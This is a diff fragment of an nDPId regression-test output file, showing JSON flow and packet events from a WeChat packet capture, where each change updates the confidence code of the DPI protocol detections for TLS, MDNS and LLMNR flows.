00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1492167777476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777476,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XvtAAEAGukDAqAFny82Tq+K3Abv08QbKs2vgPoAQAOVlIAAAAQEICgAyWHdFrtz+"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1492167788126,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167788126,"pkt":"AQBeAAD70CeIF3AECABFoABEPYcAAAER2HrAqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788128,"flow_last_seen":1492167788128,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788128,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1492167788128,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167788128,"pkt":"MzMAAAD70CeIF3AEht1gAAAAADARAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw3CsAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} -00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788128,"flow_last_seen":1492167788128,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788128,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788128,"flow_last_seen":1492167788128,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788128,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1492167789152,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167789152,"pkt":"AQBeAAD70CeIF3AECABFoABEPhsAAAER1+bAqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1492167789153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167789153,"pkt":"MzMAAAD70CeIF3AEht1gAAAAADARAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw3CsAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1492167789154,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167789154,"pkt":"AQBeAAD70CeIF3AECABFoABEPiIAAAER19\/AqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1350,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1492167789157,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167789157,"pkt":"MzMAAAD70CeIF3AEht1gAAAAADARAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw3CsAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795087,"flow_last_seen":1492167795087,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795087,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1492167795087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1492167795087,"pkt":"AQBeAAD80CeIF3AECABFoAA4QcoAAAER1ELAqAFk4AAA\/NNsFOsAJPA+T9YAAAABAAAAAAAACmxiamFtd3B0eHoAAAEAAQ=="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795087,"flow_last_seen":1492167795087,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795087,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795087,"flow_last_seen":1492167795087,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795087,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795088,"flow_last_seen":1492167795088,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795088,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1492167795088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1492167795088,"pkt":"AQBeAAD80CeIF3AECABFoAA2QcsAAAER1EPAqAFk4AAA\/MKoFOsAIsj\/\/HMAAAABAAAAAAAACGNhbnNhcWNxAAABAAE="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795088,"flow_last_seen":1492167795088,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795088,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795088,"flow_last_seen":1492167795088,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795088,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795090,"flow_last_seen":1492167795090,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795090,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1492167795090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1492167795090,"pkt":"AQBeAAD80CeIF3AECABFoAA2QcwAAAER1ELAqAFk4AAA\/OA5FOsAIm9WRGIAAAABAAAAAAAACG1jenRtcGtjAAABAAE="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795090,"flow_last_seen":1492167795090,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795090,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795090,"flow_last_seen":1492167795090,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795090,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795091,"flow_last_seen":1492167795091,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795091,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1492167795091,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":90,"pkt_l4_len":36,"thread_ts_msec":1492167795091,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACQRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADxQgU6wAk8ypP1gAAAAEAAAAAAAAKbGJqYW13cHR4egAAAQAB"} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795091,"flow_last_seen":1492167795091,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795091,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795091,"flow_last_seen":1492167795091,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795091,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795092,"flow_last_seen":1492167795092,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795092,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1492167795092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1492167795092,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACIRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADwCsU6wAiwAT8cwAAAAEAAAAAAAAIY2Fuc2FxY3EAAAEAAQ=="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795092,"flow_last_seen":1492167795092,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795092,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795092,"flow_last_seen":1492167795092,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795092,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795095,"flow_last_seen":1492167795095,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795095,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1492167795095,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1492167795095,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACIRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADxZEU6wAifoZEYgAAAAEAAAAAAAAIbWN6dG1wa2MAAAEAAQ=="} 